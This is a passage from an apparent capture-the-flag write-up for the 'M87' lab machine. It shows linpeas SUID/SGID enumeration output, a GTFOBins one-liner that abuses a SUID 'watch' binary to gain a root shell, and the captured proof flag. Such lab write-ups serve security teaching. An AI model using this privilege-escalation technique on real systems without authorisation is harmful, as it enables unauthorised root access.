/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/cockpit/cockpit-session
/usr/lib/openssh/ssh-keysign
charlotte@M87:~$
Upload the linpeas.sh script to the target host, change its permissions and run it.
From the script output, the SUID bit on the watch command can be used to escalate privileges, following the GTFOBins method:
╔═══════════════════╗
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strings Not Found
strace Not Found
-rwsr-xr-- 1 root dip 378K Feb 20 2020 /usr/sbin/pppd ---> Apple_Mac_OSX_10.4.8(05-2007)
-rwsr-xr-x 1 root root 1.3M Sep 26 2020 /usr/sbin/exim4
-rwsr-sr-x 1 root root 27K May 31 2018 /usr/bin/watch
-rwsr-xr-x 1 root root 83K Jul 27 2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 53K Jul 27 2018 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 154K Feb 2 2020 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-sr-x 1 root root 489K Mar 15 2019 /usr/bin/rsync
-rwsr-xr-x 1 root root 63K Jan 10 2019 /usr/bin/su
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 151K Mar 21 2019 /usr/bin/ntfs-3g ---> Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others(02-2017)
-rwsr-xr-x 1 root root 35K Apr 22 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 63K Jul 27 2018 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 51K Jan 10 2019 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 23K Jan 15 2019 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-x 1 root root 35K Jan 10 2019 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 50K Jul 5 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 19K Jan 15 2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-x--- 1 root cockpit-wsinstance 52K Oct 2 2020 /usr/lib/cockpit/cockpit-session (Unknown SUID binary)
-rwsr-xr-x 1 root root 427K Jan 31 2020 /usr/lib/openssh/ssh-keysign
╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root shadow 39K Feb 14 2019 /usr/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 71K Jul 27 2018 /usr/bin/chage
-rwsr-sr-x 1 root root 27K May 31 2018 /usr/bin/watch
-rwxr-sr-x 1 root crontab 43K Oct 11 2019 /usr/bin/crontab
-rwxr-sr-x 1 root tty 35K Jan 10 2019 /usr/bin/wall
-rwsr-sr-x 1 root root 489K Mar 15 2019 /usr/bin/rsync
-rwxr-sr-x 1 root mail 19K Dec 3 2017 /usr/bin/dotlockfile
-rwxr-sr-x 1 root ssh 315K Jan 31 2020 /usr/bin/ssh-agent
-rwxr-sr-x 1 root shadow 31K Jul 27 2018 /usr/bin/expiry
-rwxr-sr-x 1 root tty 15K May 4 2018 /usr/bin/bsd-write
-rwxr-sr-x 1 root root 15K Nov 22 2019 /usr/bin/dotlock.mailutils
charlotte@M87:/tmp$ /usr/bin/watch -x sh -p -c 'reset; exec sh -p 1>&0 2>&0'
/usr/bin/watch -x sh -p -c 'reset; exec sh -p 1>&0 2>&0'
# id
id
uid=1000(charlotte) gid=1000(charlotte) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),1000(charlotte)
# cd /root
cd /root
# ls -alh
ls -alh
total 28K
drwx------ 4 root root 4.0K Nov 6 2020 .
drwxr-xr-x 18 root root 4.0K Nov 6 2020 ..
lrwxrwxrwx 1 root root 9 Nov 6 2020 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwx------ 3 root root 4.0K Nov 6 2020 .gnupg
drwxr-xr-x 3 root root 4.0K Nov 6 2020 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw------- 1 root root 1.2K Nov 6 2020 proof.txt
# cat proof.txt
cat proof.txt
MMMMMMMM MMMMMMMM 888888888 77777777777777777777
M:::::::M M:::::::M 88:::::::::88 7::::::::::::::::::7
M::::::::M M::::::::M 88:::::::::::::88 7::::::::::::::::::7
M:::::::::M M:::::::::M8::::::88888::::::8777777777777:::::::7
M::::::::::M M::::::::::M8:::::8 8:::::8 7::::::7
M:::::::::::M M:::::::::::M8:::::8 8:::::8 7::::::7
M:::::::M::::M M::::M:::::::M 8:::::88888:::::8 7::::::7
M::::::M M::::M M::::M M::::::M 8:::::::::::::8 7::::::7
M::::::M M::::M::::M M::::::M 8:::::88888:::::8 7::::::7
M::::::M M:::::::M M::::::M8:::::8 8:::::8 7::::::7
M::::::M M:::::M M::::::M8:::::8 8:::::8 7::::::7
M::::::M MMMMM M::::::M8:::::8 8:::::8 7::::::7
M::::::M M::::::M8::::::88888::::::8 7::::::7
M::::::M M::::::M 88:::::::::::::88 7::::::7
M::::::M M::::::M 88:::::::::88 7::::::7
MMMMMMMM MMMMMMMM 888888888 77777777
Congratulations!
You've rooted m87!
21e5e63855f249bcd1b4b093af669b1e
mindsflee
#
Privilege escalation successful!
From: https://www.cnblogs.com/jason-huawen/p/16929346.html